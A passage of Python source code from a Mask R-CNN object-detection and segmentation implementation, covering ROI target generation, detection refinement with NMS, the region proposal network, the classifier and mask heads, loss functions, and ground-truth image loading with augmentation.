class_ids: [TRAIN_ROIS_PER_IMAGE]. Integer class IDs. Zero padded.
deltas: [TRAIN_ROIS_PER_IMAGE, (dy, dx, log(dh), log(dw))]
masks: [TRAIN_ROIS_PER_IMAGE, height, width]. Masks cropped to bbox
boundaries and resized to neural network output size.
Note: Returned arrays might be zero padded if not enough target ROIs.
"""
# Assertions
asserts = [
tf.Assert(tf.greater(tf.shape(proposals)[0], 0), [proposals],
name="roi_assertion"),
]
with tf.control_dependencies(asserts):
proposals = tf.identity(proposals)
# Remove zero padding
proposals, _ = trim_zeros_graph(proposals, name="trim_proposals")
gt_boxes, non_zeros = trim_zeros_graph(gt_boxes, name="trim_gt_boxes")
gt_class_ids = tf.boolean_mask(gt_class_ids, non_zeros,
name="trim_gt_class_ids")
gt_masks = tf.gather(gt_masks, tf.where(non_zeros)[:, 0], axis=2,
name="trim_gt_masks")
# Handle COCO crowds
# A crowd box in COCO is a bounding box around several instances. Exclude
# them from training. A crowd box is given a negative class ID.
crowd_ix = tf.where(gt_class_ids < 0)[:, 0]
non_crowd_ix = tf.where(gt_class_ids > 0)[:, 0]
crowd_boxes = tf.gather(gt_boxes, crowd_ix)
gt_class_ids = tf.gather(gt_class_ids, non_crowd_ix)
gt_boxes = tf.gather(gt_boxes, non_crowd_ix)
gt_masks = tf.gather(gt_masks, non_crowd_ix, axis=2)
# Compute overlaps matrix [proposals, gt_boxes]
overlaps = overlaps_graph(proposals, gt_boxes)
# Compute overlaps with crowd boxes [proposals, crowd_boxes]
crowd_overlaps = overlaps_graph(proposals, crowd_boxes)
crowd_iou_max = tf.reduce_max(crowd_overlaps, axis=1)
no_crowd_bool = (crowd_iou_max < 0.001)
# Determine positive and negative ROIs
roi_iou_max = tf.reduce_max(overlaps, axis=1)
# 1. Positive ROIs are those with >= 0.5 IoU with a GT box
positive_roi_bool = (roi_iou_max >= 0.5)
positive_indices = tf.where(positive_roi_bool)[:, 0]
# 2. Negative ROIs are those with < 0.5 with every GT box. Skip crowds.
negative_indices = tf.where(tf.logical_and(roi_iou_max < 0.5, no_crowd_bool))[:, 0]
# Subsample ROIs. Aim for 33% positive
# Positive ROIs
positive_count = int(config.TRAIN_ROIS_PER_IMAGE *
config.ROI_POSITIVE_RATIO)
positive_indices = tf.random.shuffle(positive_indices)[:positive_count]
positive_count = tf.shape(positive_indices)[0]
# Negative ROIs. Add enough to maintain positive:negative ratio.
r = 1.0 / config.ROI_POSITIVE_RATIO
negative_count = tf.cast(r * tf.cast(positive_count, tf.float32), tf.int32) - positive_count
negative_indices = tf.random.shuffle(negative_indices)[:negative_count]
# Gather selected ROIs
positive_rois = tf.gather(proposals, positive_indices)
negative_rois = tf.gather(proposals, negative_indices)
# Assign positive ROIs to GT boxes.
positive_overlaps = tf.gather(overlaps, positive_indices)
roi_gt_box_assignment = tf.cond(
tf.greater(tf.shape(positive_overlaps)[1], 0),
true_fn=lambda: tf.argmax(positive_overlaps, axis=1),
false_fn=lambda: tf.cast(tf.constant([]), tf.int64)
)
roi_gt_boxes = tf.gather(gt_boxes, roi_gt_box_assignment)
roi_gt_class_ids = tf.gather(gt_class_ids, roi_gt_box_assignment)
# Compute bbox refinement for positive ROIs
deltas = utils.box_refinement_graph(positive_rois, roi_gt_boxes)
deltas /= config.BBOX_STD_DEV
# Assign positive ROIs to GT masks
# Permute masks to [N, height, width, 1]
transposed_masks = tf.expand_dims(tf.transpose(gt_masks, [2, 0, 1]), -1)
# Pick the right mask for each ROI
roi_masks = tf.gather(transposed_masks, roi_gt_box_assignment)
# Compute mask targets
boxes = positive_rois
if config.USE_MINI_MASK:
# Transform ROI coordinates from normalized image space
# to normalized mini-mask space.
y1, x1, y2, x2 = tf.split(positive_rois, 4, axis=1)
gt_y1, gt_x1, gt_y2, gt_x2 = tf.split(roi_gt_boxes, 4, axis=1)
gt_h = gt_y2 - gt_y1
gt_w = gt_x2 - gt_x1
y1 = (y1 - gt_y1) / gt_h
x1 = (x1 - gt_x1) / gt_w
y2 = (y2 - gt_y1) / gt_h
x2 = (x2 - gt_x1) / gt_w
boxes = tf.concat([y1, x1, y2, x2], 1)
box_ids = tf.range(0, tf.shape(roi_masks)[0])
masks = tf.image.crop_and_resize(tf.cast(roi_masks, tf.float32), boxes,
box_ids,
config.MASK_SHAPE)
# Remove the extra dimension from masks.
masks = tf.squeeze(masks, axis=3)
# Threshold mask pixels at 0.5 to have GT masks be 0 or 1 to use with
# binary cross entropy loss.
masks = tf.round(masks)
# Append negative ROIs and pad bbox deltas and masks that
# are not used for negative ROIs with zeros.
rois = tf.concat([positive_rois, negative_rois], axis=0)
N = tf.shape(negative_rois)[0]
P = tf.maximum(config.TRAIN_ROIS_PER_IMAGE - tf.shape(rois)[0], 0)
rois = tf.pad(rois, [(0, P), (0, 0)])
roi_gt_boxes = tf.pad(roi_gt_boxes, [(0, N + P), (0, 0)])
roi_gt_class_ids = tf.pad(roi_gt_class_ids, [(0, N + P)])
deltas = tf.pad(deltas, [(0, N + P), (0, 0)])
masks = tf.pad(masks, [[0, N + P], (0, 0), (0, 0)])
return rois, roi_gt_class_ids, deltas, masks
class DetectionTargetLayer(KE.Layer):
"""Subsamples proposals and generates target box refinement, class_ids,
and masks for each.
Inputs:
proposals: [batch, N, (y1, x1, y2, x2)] in normalized coordinates. Might
be zero padded if there are not enough proposals.
gt_class_ids: [batch, MAX_GT_INSTANCES] Integer class IDs.
gt_boxes: [batch, MAX_GT_INSTANCES, (y1, x1, y2, x2)] in normalized
coordinates.
gt_masks: [batch, height, width, MAX_GT_INSTANCES] of boolean type
Returns: Target ROIs and corresponding class IDs, bounding box shifts,
and masks.
rois: [batch, TRAIN_ROIS_PER_IMAGE, (y1, x1, y2, x2)] in normalized
coordinates
target_class_ids: [batch, TRAIN_ROIS_PER_IMAGE]. Integer class IDs.
target_deltas: [batch, TRAIN_ROIS_PER_IMAGE, (dy, dx, log(dh), log(dw)]
target_mask: [batch, TRAIN_ROIS_PER_IMAGE, height, width]
Masks cropped to bbox boundaries and resized to neural
network output size.
Note: Returned arrays might be zero padded if not enough target ROIs.
"""
def __init__(self, config, **kwargs):
super(DetectionTargetLayer, self).__init__(**kwargs)
self.config = config
def call(self, inputs):
proposals = inputs[0]
gt_class_ids = inputs[1]
gt_boxes = inputs[2]
gt_masks = inputs[3]
# Slice the batch and run a graph for each slice
# TODO: Rename target_bbox to target_deltas for clarity
names = ["rois", "target_class_ids", "target_bbox", "target_mask"]
outputs = utils.batch_slice(
[proposals, gt_class_ids, gt_boxes, gt_masks],
lambda w, x, y, z: detection_targets_graph(
w, x, y, z, self.config),
self.config.IMAGES_PER_GPU, names=names)
return outputs
def compute_output_shape(self, input_shape):
return [
(None, self.config.TRAIN_ROIS_PER_IMAGE, 4), # rois
(None, self.config.TRAIN_ROIS_PER_IMAGE), # class_ids
(None, self.config.TRAIN_ROIS_PER_IMAGE, 4), # deltas
(None, self.config.TRAIN_ROIS_PER_IMAGE, self.config.MASK_SHAPE[0],
self.config.MASK_SHAPE[1]) # masks
]
def compute_mask(self, inputs, mask=None):
return [None, None, None, None]
############################################################
# Detection Layer
############################################################
def refine_detections_graph(rois, probs, deltas, window, config):
"""Refine classified proposals and filter overlaps and return final
detections.
Inputs:
rois: [N, (y1, x1, y2, x2)] in normalized coordinates
probs: [N, num_classes]. Class probabilities.
deltas: [N, num_classes, (dy, dx, log(dh), log(dw))]. Class-specific
bounding box deltas.
window: (y1, x1, y2, x2) in normalized coordinates. The part of the image
that contains the image excluding the padding.
Returns detections shaped: [num_detections, (y1, x1, y2, x2, class_id, score)] where
coordinates are normalized.
"""
# Class IDs per ROI
class_ids = tf.argmax(probs, axis=1, output_type=tf.int32)
# Class probability of the top class of each ROI
indices = tf.stack([tf.range(tf.shape(probs)[0]), class_ids], axis=1)
class_scores = tf.gather_nd(probs, indices)
# Class-specific bounding box deltas
deltas_specific = tf.gather_nd(deltas, indices)
# Apply bounding box deltas
# Shape: [boxes, (y1, x1, y2, x2)] in normalized coordinates
refined_rois = apply_box_deltas_graph(
rois, deltas_specific * config.BBOX_STD_DEV)
# Clip boxes to image window
refined_rois = clip_boxes_graph(refined_rois, window)
# TODO: Filter out boxes with zero area
# Filter out background boxes
keep = tf.where(class_ids > 0)[:, 0]
# Filter out low confidence boxes
if config.DETECTION_MIN_CONFIDENCE:
conf_keep = tf.where(class_scores >= config.DETECTION_MIN_CONFIDENCE)[:, 0]
keep = tf.sets.intersection(tf.expand_dims(keep, 0),
tf.expand_dims(conf_keep, 0))
keep = tf.sparse.to_dense(keep)[0]
# Apply per-class NMS
# 1. Prepare variables
pre_nms_class_ids = tf.gather(class_ids, keep)
pre_nms_scores = tf.gather(class_scores, keep)
pre_nms_rois = tf.gather(refined_rois, keep)
unique_pre_nms_class_ids = tf.unique(pre_nms_class_ids)[0]
def nms_keep_map(class_id):
"""Apply Non-Maximum Suppression on ROIs of the given class."""
# Indices of ROIs of the given class
ixs = tf.where(tf.equal(pre_nms_class_ids, class_id))[:, 0]
# Apply NMS
class_keep = tf.image.non_max_suppression(
tf.gather(pre_nms_rois, ixs),
tf.gather(pre_nms_scores, ixs),
max_output_size=config.DETECTION_MAX_INSTANCES,
iou_threshold=config.DETECTION_NMS_THRESHOLD)
# Map indices
class_keep = tf.gather(keep, tf.gather(ixs, class_keep))
# Pad with -1 so returned tensors have the same shape
gap = config.DETECTION_MAX_INSTANCES - tf.shape(class_keep)[0]
class_keep = tf.pad(class_keep, [(0, gap)],
mode='CONSTANT', constant_values=-1)
# Set shape so map_fn() can infer result shape
class_keep.set_shape([config.DETECTION_MAX_INSTANCES])
return class_keep
# 2. Map over class IDs
nms_keep = tf.map_fn(nms_keep_map, unique_pre_nms_class_ids,
dtype=tf.int64)
# 3. Merge results into one list, and remove -1 padding
nms_keep = tf.reshape(nms_keep, [-1])
nms_keep = tf.gather(nms_keep, tf.where(nms_keep > -1)[:, 0])
# 4. Compute intersection between keep and nms_keep
keep = tf.sets.intersection(tf.expand_dims(keep, 0),
tf.expand_dims(nms_keep, 0))
keep = tf.sparse.to_dense(keep)[0]
# Keep top detections
roi_count = config.DETECTION_MAX_INSTANCES
class_scores_keep = tf.gather(class_scores, keep)
num_keep = tf.minimum(tf.shape(class_scores_keep)[0], roi_count)
top_ids = tf.nn.top_k(class_scores_keep, k=num_keep, sorted=True)[1]
keep = tf.gather(keep, top_ids)
# Arrange output as [N, (y1, x1, y2, x2, class_id, score)]
# Coordinates are normalized.
detections = tf.concat([
tf.gather(refined_rois, keep),
tf.cast(tf.gather(class_ids, keep), tf.float32)[..., tf.newaxis],
tf.gather(class_scores, keep)[..., tf.newaxis]
], axis=1)
# Pad with zeros if detections < DETECTION_MAX_INSTANCES
gap = config.DETECTION_MAX_INSTANCES - tf.shape(detections)[0]
detections = tf.pad(detections, [(0, gap), (0, 0)], "CONSTANT")
return detections
class DetectionLayer(KE.Layer):
"""Takes classified proposal boxes and their bounding box deltas and
returns the final detection boxes.
Returns:
[batch, num_detections, (y1, x1, y2, x2, class_id, class_score)] where
coordinates are normalized.
"""
def __init__(self, config=None, **kwargs):
super(DetectionLayer, self).__init__(**kwargs)
self.config = config
def call(self, inputs):
rois = inputs[0]
mrcnn_class = inputs[1]
mrcnn_bbox = inputs[2]
image_meta = inputs[3]
# Get windows of images in normalized coordinates. Windows are the area
# in the image that excludes the padding.
# Use the shape of the first image in the batch to normalize the window
# because we know that all images get resized to the same size.
m = parse_image_meta_graph(image_meta)
image_shape = m['image_shape'][0]
window = norm_boxes_graph(m['window'], image_shape[:2])
# Run detection refinement graph on each item in the batch
detections_batch = utils.batch_slice(
[rois, mrcnn_class, mrcnn_bbox, window],
lambda x, y, w, z: refine_detections_graph(x, y, w, z, self.config),
self.config.IMAGES_PER_GPU)
# Reshape output
# [batch, num_detections, (y1, x1, y2, x2, class_id, class_score)] in
# normalized coordinates
return tf.reshape(
detections_batch,
[self.config.BATCH_SIZE, self.config.DETECTION_MAX_INSTANCES, 6])
def compute_output_shape(self, input_shape):
return (None, self.config.DETECTION_MAX_INSTANCES, 6)
############################################################
# Region Proposal Network (RPN)
############################################################
def rpn_graph(feature_map, anchors_per_location, anchor_stride):
"""Builds the computation graph of Region Proposal Network.
feature_map: backbone features [batch, height, width, depth]
anchors_per_location: number of anchors per pixel in the feature map
anchor_stride: Controls the density of anchors. Typically 1 (anchors for
every pixel in the feature map), or 2 (every other pixel).
Returns:
rpn_class_logits: [batch, H * W * anchors_per_location, 2] Anchor classifier logits (before softmax)
rpn_probs: [batch, H * W * anchors_per_location, 2] Anchor classifier probabilities.
rpn_bbox: [batch, H * W * anchors_per_location, (dy, dx, log(dh), log(dw))] Deltas to be
applied to anchors.
"""
# TODO: check if stride of 2 causes alignment issues if the feature map
# is not even.
# Shared convolutional base of the RPN
shared = KL.Conv2D(512, (3, 3), padding='same', activation='relu',
strides=anchor_stride,
name='rpn_conv_shared')(feature_map)
# Anchor Score. [batch, height, width, anchors per location * 2].
x = KL.Conv2D(2 * anchors_per_location, (1, 1), padding='valid',
activation='linear', name='rpn_class_raw')(shared)
# Reshape to [batch, anchors, 2]
rpn_class_logits = KL.Lambda(
lambda t: tf.reshape(t, [tf.shape(t)[0], -1, 2]))(x)
# Softmax on last dimension of BG/FG.
rpn_probs = KL.Activation(
"softmax", name="rpn_class_xxx")(rpn_class_logits)
# Bounding box refinement. [batch, H, W, anchors per location * depth]
# where depth is [x, y, log(w), log(h)]
x = KL.Conv2D(anchors_per_location * 4, (1, 1), padding="valid",
activation='linear', name='rpn_bbox_pred')(shared)
# Reshape to [batch, anchors, 4]
rpn_bbox = KL.Lambda(lambda t: tf.reshape(t, [tf.shape(t)[0], -1, 4]))(x)
return [rpn_class_logits, rpn_probs, rpn_bbox]
def build_rpn_model(anchor_stride, anchors_per_location, depth):
"""Builds a Keras model of the Region Proposal Network.
It wraps the RPN graph so it can be used multiple times with shared
weights.
anchors_per_location: number of anchors per pixel in the feature map
anchor_stride: Controls the density of anchors. Typically 1 (anchors for
every pixel in the feature map), or 2 (every other pixel).
depth: Depth of the backbone feature map.
Returns a Keras Model object. The model outputs, when called, are:
rpn_class_logits: [batch, H * W * anchors_per_location, 2] Anchor classifier logits (before softmax)
rpn_probs: [batch, H * W * anchors_per_location, 2] Anchor classifier probabilities.
rpn_bbox: [batch, H * W * anchors_per_location, (dy, dx, log(dh), log(dw))] Deltas to be
applied to anchors.
"""
input_feature_map = KL.Input(shape=[None, None, depth],
name="input_rpn_feature_map")
outputs = rpn_graph(input_feature_map, anchors_per_location, anchor_stride)
return KM.Model([input_feature_map], outputs, name="rpn_model")
############################################################
# Feature Pyramid Network Heads
############################################################
def fpn_classifier_graph(rois, feature_maps, image_meta,
pool_size, num_classes, train_bn=True,
fc_layers_size=1024):
"""Builds the computation graph of the feature pyramid network classifier
and regressor heads.
rois: [batch, num_rois, (y1, x1, y2, x2)] Proposal boxes in normalized
coordinates.
feature_maps: List of feature maps from different layers of the pyramid,
[P2, P3, P4, P5]. Each has a different resolution.
image_meta: [batch, (meta data)] Image details. See compose_image_meta()
pool_size: The width of the square feature map generated from ROI Pooling.
num_classes: number of classes, which determines the depth of the results
train_bn: Boolean. Train or freeze Batch Norm layers
fc_layers_size: Size of the 2 FC layers
Returns:
logits: [batch, num_rois, NUM_CLASSES] classifier logits (before softmax)
probs: [batch, num_rois, NUM_CLASSES] classifier probabilities
bbox_deltas: [batch, num_rois, NUM_CLASSES, (dy, dx, log(dh), log(dw))] Deltas to apply to
proposal boxes
"""
# ROI Pooling
# Shape: [batch, num_rois, POOL_SIZE, POOL_SIZE, channels]
x = PyramidROIAlign([pool_size, pool_size],
name="roi_align_classifier")([rois, image_meta] + feature_maps)
# Two 1024 FC layers (implemented with Conv2D for consistency)
x = KL.TimeDistributed(KL.Conv2D(fc_layers_size, (pool_size, pool_size), padding="valid"),
name="mrcnn_class_conv1")(x)
x = KL.TimeDistributed(BatchNorm(), name='mrcnn_class_bn1')(x, training=train_bn)
x = KL.Activation('relu')(x)
x = KL.TimeDistributed(KL.Conv2D(fc_layers_size, (1, 1)),
name="mrcnn_class_conv2")(x)
x = KL.TimeDistributed(BatchNorm(), name='mrcnn_class_bn2')(x, training=train_bn)
x = KL.Activation('relu')(x)
shared = KL.Lambda(lambda x: K.squeeze(K.squeeze(x, 3), 2),
name="pool_squeeze")(x)
# Classifier head
mrcnn_class_logits = KL.TimeDistributed(KL.Dense(num_classes),
name='mrcnn_class_logits')(shared)
mrcnn_probs = KL.TimeDistributed(KL.Activation("softmax"),
name="mrcnn_class")(mrcnn_class_logits)
# BBox head
# [batch, num_rois, NUM_CLASSES * (dy, dx, log(dh), log(dw))]
x = KL.TimeDistributed(KL.Dense(num_classes * 4, activation='linear'),
name='mrcnn_bbox_fc')(shared)
# Reshape to [batch, num_rois, NUM_CLASSES, (dy, dx, log(dh), log(dw))]
s = K.int_shape(x)
s1 = s[1] if s[1] != None else -1
mrcnn_bbox = KL.Reshape((s1, num_classes, 4), name="mrcnn_bbox")(x)
return mrcnn_class_logits, mrcnn_probs, mrcnn_bbox
def build_fpn_mask_graph(rois, feature_maps, image_meta,
pool_size, num_classes, train_bn=True):
"""Builds the computation graph of the mask head of Feature Pyramid Network.
rois: [batch, num_rois, (y1, x1, y2, x2)] Proposal boxes in normalized
coordinates.
feature_maps: List of feature maps from different layers of the pyramid,
[P2, P3, P4, P5]. Each has a different resolution.
image_meta: [batch, (meta data)] Image details. See compose_image_meta()
pool_size: The width of the square feature map generated from ROI Pooling.
num_classes: number of classes, which determines the depth of the results
train_bn: Boolean. Train or freeze Batch Norm layers
Returns: Masks [batch, num_rois, MASK_POOL_SIZE, MASK_POOL_SIZE, NUM_CLASSES]
"""
# ROI Pooling
# Shape: [batch, num_rois, MASK_POOL_SIZE, MASK_POOL_SIZE, channels]
x = PyramidROIAlign([pool_size, pool_size],
name="roi_align_mask")([rois, image_meta] + feature_maps)
# Conv layers
x = KL.TimeDistributed(KL.Conv2D(256, (3, 3), padding="same"),
name="mrcnn_mask_conv1")(x)
x = KL.TimeDistributed(BatchNorm(),
name='mrcnn_mask_bn1')(x, training=train_bn)
x = KL.Activation('relu')(x)
x = KL.TimeDistributed(KL.Conv2D(256, (3, 3), padding="same"),
name="mrcnn_mask_conv2")(x)
x = KL.TimeDistributed(BatchNorm(),
name='mrcnn_mask_bn2')(x, training=train_bn)
x = KL.Activation('relu')(x)
x = KL.TimeDistributed(KL.Conv2D(256, (3, 3), padding="same"),
name="mrcnn_mask_conv3")(x)
x = KL.TimeDistributed(BatchNorm(),
name='mrcnn_mask_bn3')(x, training=train_bn)
x = KL.Activation('relu')(x)
x = KL.TimeDistributed(KL.Conv2D(256, (3, 3), padding="same"),
name="mrcnn_mask_conv4")(x)
x = KL.TimeDistributed(BatchNorm(),
name='mrcnn_mask_bn4')(x, training=train_bn)
x = KL.Activation('relu')(x)
x = KL.TimeDistributed(KL.Conv2DTranspose(256, (2, 2), strides=2, activation="relu"),
name="mrcnn_mask_deconv")(x)
x = KL.TimeDistributed(KL.Conv2D(num_classes, (1, 1), strides=1, activation="sigmoid"),
name="mrcnn_mask")(x)
return x
############################################################
# Loss Functions
############################################################
def smooth_l1_loss(y_true, y_pred):
"""Implements Smooth-L1 loss.
y_true and y_pred are typically: [N, 4], but could be any shape.
"""
diff = K.abs(y_true - y_pred)
less_than_one = K.cast(K.less(diff, 1.0), "float32")
loss = (less_than_one * 0.5 * diff**2) + (1 - less_than_one) * (diff - 0.5)
return loss
def rpn_class_loss_graph(rpn_match, rpn_class_logits):
"""RPN anchor classifier loss.
rpn_match: [batch, anchors, 1]. Anchor match type. 1=positive,
-1=negative, 0=neutral anchor.
rpn_class_logits: [batch, anchors, 2]. RPN classifier logits for BG/FG.
"""
# Squeeze last dim to simplify
rpn_match = tf.squeeze(rpn_match, -1)
# Get anchor classes. Convert the -1/+1 match to 0/1 values.
anchor_class = K.cast(K.equal(rpn_match, 1), tf.int32)
# Positive and Negative anchors contribute to the loss,
# but neutral anchors (match value = 0) don't.
indices = tf.where(K.not_equal(rpn_match, 0))
# Pick rows that contribute to the loss and filter out the rest.
rpn_class_logits = tf.gather_nd(rpn_class_logits, indices)
anchor_class = tf.gather_nd(anchor_class, indices)
# Cross entropy loss
loss = K.sparse_categorical_crossentropy(target=anchor_class,
output=rpn_class_logits,
from_logits=True)
loss = K.switch(tf.size(loss) > 0, K.mean(loss), tf.constant(0.0))
return loss
def rpn_bbox_loss_graph(config, target_bbox, rpn_match, rpn_bbox):
"""Return the RPN bounding box loss graph.
config: the model config object.
target_bbox: [batch, max positive anchors, (dy, dx, log(dh), log(dw))].
Uses 0 padding to fill in unsed bbox deltas.
rpn_match: [batch, anchors, 1]. Anchor match type. 1=positive,
-1=negative, 0=neutral anchor.
rpn_bbox: [batch, anchors, (dy, dx, log(dh), log(dw))]
"""
# Positive anchors contribute to the loss, but negative and
# neutral anchors (match value of 0 or -1) don't.
rpn_match = K.squeeze(rpn_match, -1)
indices = tf.where(K.equal(rpn_match, 1))
# Pick bbox deltas that contribute to the loss
rpn_bbox = tf.gather_nd(rpn_bbox, indices)
# Trim target bounding box deltas to the same length as rpn_bbox.
batch_counts = K.sum(K.cast(K.equal(rpn_match, 1), tf.int32), axis=1)
target_bbox = batch_pack_graph(target_bbox, batch_counts,
config.IMAGES_PER_GPU)
loss = smooth_l1_loss(target_bbox, rpn_bbox)
loss = K.switch(tf.size(loss) > 0, K.mean(loss), tf.constant(0.0))
return loss
def mrcnn_class_loss_graph(target_class_ids, pred_class_logits,
active_class_ids):
"""Loss for the classifier head of Mask RCNN.
target_class_ids: [batch, num_rois]. Integer class IDs. Uses zero
padding to fill in the array.
pred_class_logits: [batch, num_rois, num_classes]
active_class_ids: [batch, num_classes]. Has a value of 1 for
classes that are in the dataset of the image, and 0
for classes that are not in the dataset.
"""
# During model building, Keras calls this function with
# target_class_ids of type float32. Unclear why. Cast it
# to int to get around it.
target_class_ids = tf.cast(target_class_ids, 'int64')
# Find predictions of classes that are not in the dataset.
pred_class_ids = tf.argmax(pred_class_logits, axis=2)
# TODO: Update this line to work with batch > 1. Right now it assumes all
# images in a batch have the same active_class_ids
pred_active = tf.gather(active_class_ids[0], pred_class_ids)
# Loss
loss = tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=target_class_ids, logits=pred_class_logits)
# Erase losses of predictions of classes that are not in the active
# classes of the image.
loss = loss * pred_active
# Computer loss mean. Use only predictions that contribute
# to the loss to get a correct mean.
loss = tf.reduce_sum(loss) / tf.reduce_sum(pred_active)
return loss
def mrcnn_bbox_loss_graph(target_bbox, target_class_ids, pred_bbox):
"""Loss for Mask R-CNN bounding box refinement.
target_bbox: [batch, num_rois, (dy, dx, log(dh), log(dw))]
target_class_ids: [batch, num_rois]. Integer class IDs.
pred_bbox: [batch, num_rois, num_classes, (dy, dx, log(dh), log(dw))]
"""
# Reshape to merge batch and roi dimensions for simplicity.
target_class_ids = K.reshape(target_class_ids, (-1,))
target_bbox = K.reshape(target_bbox, (-1, 4))
pred_bbox = K.reshape(pred_bbox, (-1, K.int_shape(pred_bbox)[2], 4))
# Only positive ROIs contribute to the loss. And only
# the right class_id of each ROI. Get their indices.
positive_roi_ix = tf.where(target_class_ids > 0)[:, 0]
positive_roi_class_ids = tf.cast(
tf.gather(target_class_ids, positive_roi_ix), tf.int64)
indices = tf.stack([positive_roi_ix, positive_roi_class_ids], axis=1)
# Gather the deltas (predicted and true) that contribute to loss
target_bbox = tf.gather(target_bbox, positive_roi_ix)
pred_bbox = tf.gather_nd(pred_bbox, indices)
# Smooth-L1 Loss
loss = K.switch(tf.size(target_bbox) > 0,
smooth_l1_loss(y_true=target_bbox, y_pred=pred_bbox),
tf.constant(0.0))
loss = K.mean(loss)
return loss
def mrcnn_mask_loss_graph(target_masks, target_class_ids, pred_masks):
"""Mask binary cross-entropy loss for the masks head.
target_masks: [batch, num_rois, height, width].
A float32 tensor of values 0 or 1. Uses zero padding to fill array.
target_class_ids: [batch, num_rois]. Integer class IDs. Zero padded.
pred_masks: [batch, proposals, height, width, num_classes] float32 tensor
with values from 0 to 1.
"""
# Reshape for simplicity. Merge first two dimensions into one.
target_class_ids = K.reshape(target_class_ids, (-1,))
mask_shape = tf.shape(target_masks)
target_masks = K.reshape(target_masks, (-1, mask_shape[2], mask_shape[3]))
pred_shape = tf.shape(pred_masks)
pred_masks = K.reshape(pred_masks,
(-1, pred_shape[2], pred_shape[3], pred_shape[4]))
# Permute predicted masks to [N, num_classes, height, width]
pred_masks = tf.transpose(pred_masks, [0, 3, 1, 2])
# Only positive ROIs contribute to the loss. And only
# the class specific mask of each ROI.
positive_ix = tf.where(target_class_ids > 0)[:, 0]
positive_class_ids = tf.cast(
tf.gather(target_class_ids, positive_ix), tf.int64)
indices = tf.stack([positive_ix, positive_class_ids], axis=1)
# Gather the masks (predicted and true) that contribute to loss
y_true = tf.gather(target_masks, positive_ix)
y_pred = tf.gather_nd(pred_masks, indices)
# Compute binary cross entropy. If no positive ROIs, then return 0.
# shape: [batch, roi, num_classes]
loss = K.switch(tf.size(y_true) > 0,
K.binary_crossentropy(target=y_true, output=y_pred),
tf.constant(0.0))
loss = K.mean(loss)
return loss
############################################################
# Data Generator
############################################################
def load_image_gt(dataset, config, image_id, augmentation=None,
use_mini_mask=False):
"""Load and return ground truth data for an image (image, mask, bounding boxes).
augmentation: Optional. An imgaug (https://github.com/aleju/imgaug) augmentation.
For example, passing imgaug.augmenters.Fliplr(0.5) flips images
right/left 50% of the time.
use_mini_mask: If False, returns full-size masks that are the same height
and width as the original image. These can be big, for example
1024x1024x100 (for 100 instances). Mini masks are smaller, typically,
224x224 and are generated by extracting the bounding box of the
object and resizing it to MINI_MASK_SHAPE.
Returns:
image: [height, width, 3]
shape: the original shape of the image before resizing and cropping.
class_ids: [instance_count] Integer class IDs
bbox: [instance_count, (y1, x1, y2, x2)]
mask: [height, width, instance_count]. The height and width are those
of the image unless use_mini_mask is True, in which case they are
defined in MINI_MASK_SHAPE.
"""
# Load image and mask
image = dataset.load_image(image_id)
mask, class_ids = dataset.load_mask(image_id)
original_shape = image.shape
image, window, scale, padding, crop = utils.resize_image(
image,
min_dim=config.IMAGE_MIN_DIM,
min_scale=config.IMAGE_MIN_SCALE,
max_dim=config.IMAGE_MAX_DIM,
mode=config.IMAGE_RESIZE_MODE)
mask = utils.resize_mask(mask, scale, padding, crop)
# Augmentation
# This requires the imgaug lib (https://github.com/aleju/imgaug)
if augmentation:
import imgaug
# Augmenters that are safe to apply to masks
# Some, such as Affine, have settings that make them unsafe, so always
# test your augmentation on masks
MASK_AUGMENTERS = ["Sequential", "SomeOf", "OneOf", "Sometimes",
"Fliplr", "Flipud", "CropAndPad",
"Affine", "PiecewiseAffine"]
def hook(images, augmenter, parents, default):
"""Determines which augmenters to apply to masks."""
return augmenter.__class__.__name__ in MASK_AUGMENTERS
# Store shapes before augmentation to compare
image_shape = image.shape
mask_shape = mask.shape
# Make augmenters deterministic to apply similarly to images and masks
det = augmentation.to_deterministic()
image = det.augment_image(image)
# Change mask to np.uint8 because imgaug doesn't support np.bool
mask = det.augment_image(mask.astype(np.uint8),
hooks=imgaug.HooksImages(activator=hook))
# Verify that shapes didn't change
assert image.shape == image_shape, "Augmentation shouldn't change image size"
assert mask.shape == mask_shape, "Augmentation shouldn't change mask size"
# Change mask back to bool
mask = mask.astype(np.bool)
# Note that some boxes might be all zeros if the corresponding mask got cropped out.
# and here is to filter them out
_idx = np.sum(mask, axis=(0, 1)) > 0
mask = mask[:, :, _idx]
class_ids = class_ids[_idx]
# Bounding boxes. Note that some boxes might be all zeros
# if the corresponding mask got cropped out.
# bbox: [num_instances, (y1, x1, y2, x2)]
bbox = utils.extract_bboxes(mask)
# Active classes
# Different datasets have different classes, so track the
# classes supported in the dataset of this image.
active_class_ids = np.zeros([dataset.num_classes], dtype=np.int32)
source_class_ids = dataset.source_class_ids[dataset.image_info[image_id]["source"]]
active_class_ids[source_class_ids] = 1
# Resize masks to smaller size to reduce memory usage
if use_mini_mask:
mask = utils.minimize_mask(bbox, mask, config.MINI_MASK_SHAPE)
# Image meta data
image_meta = compose_image_meta(image_id, original_shape, image.shape,
window, scale, active_class_ids)
return image, image_meta, class_ids, bbox, mask
def build_detection_targets(rpn_rois, gt_class_ids, gt_boxes, gt_masks, config):
"""Generate targets for training Stage 2 classifier and mask heads.
This is not used in normal training. It's useful for debugging or to train
the Mask RCNN heads without using the RPN head.
Inputs:
rpn_rois: [N, (y1, x1, y2, x2)] proposal boxes.
gt_class_ids: [instance count] Integer class IDs
gt_boxes: [instance count, (y1, x1, y2, x2)]
gt_masks: [height, width, instance count] Ground truth masks. Can be full
size or mini-masks.
Returns:
rois: [TRAIN_ROIS_PER_IMAGE, (y1, x1, y2, x2)]
class_ids: [TRAIN_ROIS_PER_IMAGE]. Integer class IDs.
bboxes: [TRAIN_ROIS_PER_IMAGE, NUM_CLASSES, (y, x, log(h), log(w))]. Class-specific
bbox refinements.
masks: [TRAIN_ROIS_PER_IMAGE, height, width, NUM_CLASSES). Class specific masks cropped
to bbox boundaries and resized to neural network output size.
"""
assert rpn_rois.shape[0] > 0
assert gt_class_ids.dtype == np.int32, "Expected int but got {}".format(
gt_class_ids.dtype)
assert gt_boxes.dtype == np.int32, "Expected int but got {}".format(
gt_boxes.dtype)
assert gt_masks.dtype == np.bool_, "Expected bool but got {}".format(
gt_masks.dtype)
# It's common to add GT Boxes to ROIs but we don't do that here because
# according to XinLei Chen's paper, it doesn't help.
# Trim empty padding in gt_boxes and gt_masks parts
instance_ids = np.where(gt_class_ids > 0)[0]
assert instance_ids.shape[0] > 0, "Image must contain instances."
